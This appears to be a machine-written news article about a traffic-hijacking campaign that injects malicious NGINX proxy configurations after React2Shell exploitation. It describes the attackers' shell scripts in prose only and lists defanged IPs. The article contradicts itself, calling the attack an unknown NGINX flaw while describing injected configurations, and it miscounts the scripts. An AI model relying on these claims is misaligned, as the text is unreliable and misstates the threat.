Ethical Hacking News
Cybersecurity researchers have uncovered a sophisticated web traffic hijacking campaign that leverages malicious NGINX configurations to compromise the security of web applications and redirect user traffic through attacker-controlled backend servers. The attack, which has been linked to the React2Shell vulnerability (CVE-2025-55182), exploits a previously unknown configuration flaw in NGINX to intercept legitimate web traffic and route it through the attackers' infrastructure. This article provides an in-depth analysis of the attack and its implications for cybersecurity professionals and organizations.
Cybersecurity researchers have identified a sophisticated web traffic hijacking campaign using malicious NGINX configurations. The attack exploits a previously unknown configuration flaw in NGINX to intercept and redirect legitimate user traffic. The threat actors target specific domains, including Asian TLDs, Chinese hosting infrastructure, and government and educational TLDs. The attack uses persistent shell scripts to inject malicious code into NGINX configurations. The toolkit includes multiple stages and scripts to execute the attack, highlighting the creativity of threat actors. Regular security audits and updates to NGINX configurations are essential to prevent such attacks.
Cybersecurity researchers have uncovered a sophisticated web traffic hijacking campaign that leverages malicious NGINX configurations to compromise the security of web applications and redirect user traffic through attacker-controlled backend servers. The attack, which has been linked to the React2Shell vulnerability (CVE-2025-55182), exploits a previously unknown configuration flaw in NGINX to intercept legitimate web traffic and route it through the attackers' infrastructure.
According to Datadog Security Labs, threat actors associated with the recent React2Shell exploitation have been using malicious NGINX configurations to pull off the attack. These configurations are designed to capture incoming requests on certain predefined URL paths and redirect them to domains under the attackers' control via the "proxy_pass" directive.
The attack is particularly targeted at Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov). The malicious configurations are also designed to be persistent, with the use of shell scripts to inject malicious code into NGINX.
The attack is part of a larger toolkit that includes multiple stages, including "zx.sh," which acts as the orchestrator to execute subsequent stages through legitimate utilities like curl or wget. In the event that the two programs are blocked, it creates a raw TCP connection to send an HTTP request. Another script, "bt.sh," targets the Baota (BT) Management Panel environment to overwrite NGINX configuration files. A fourth script, "4zdh.sh," enumerates common Nginx configuration locations and takes steps to minimize errors when creating new malicious configurations.
The toolkit also includes a fifth script, "ok.sh," which is responsible for generating a report detailing all active NGINX traffic hijacking rules. The threat actors' approach suggests an interest in interactive access rather than automated resource extraction.
This attack highlights the importance of regular security audits and updates to NGINX configurations. It also emphasizes the need for cybersecurity researchers and organizations to stay vigilant and monitor for signs of malicious activity.
In response to this attack, GreyNoise noted that two IP addresses – 193.142.147[.]209 and 87.121.84[.]24 – account for 56% of all observed exploitation attempts two months after React2Shell was publicly disclosed. A total of 1,083 unique source IP addresses have been involved in React2Shell exploitation between January 26 and February 2, 2026.
The discovery of this attack also underscores the importance of post-exploitation payloads and their role in facilitating persistence and creating malicious configuration files. The use of shell scripts to inject malicious code into NGINX highlights the creativity and resourcefulness of threat actors.
In conclusion, the malicious NGINX configurations used in this web traffic hijacking campaign demonstrate a sophisticated level of planning and execution by threat actors. It is essential for cybersecurity professionals and organizations to stay vigilant and monitor for signs of malicious activity, as well as to implement regular security audits and updates to NGINX configurations.
Related Information:
https://www.ethicalhackingnews.com/articles/Malicious-NGINX-Configurations-A-Lurking-Threat-to-Web-Traffic-Security-ehn.shtml
https://thehackernews.com/2026/02/hackers-exploit-react2shell-to-hijack.html
https://cybersixt.com/a/ff6tMrKmIRo_HPl7Q4rVZR
Published: Thu Feb 5 00:43:42 2026 by llama3.2 3B Q4_K_M
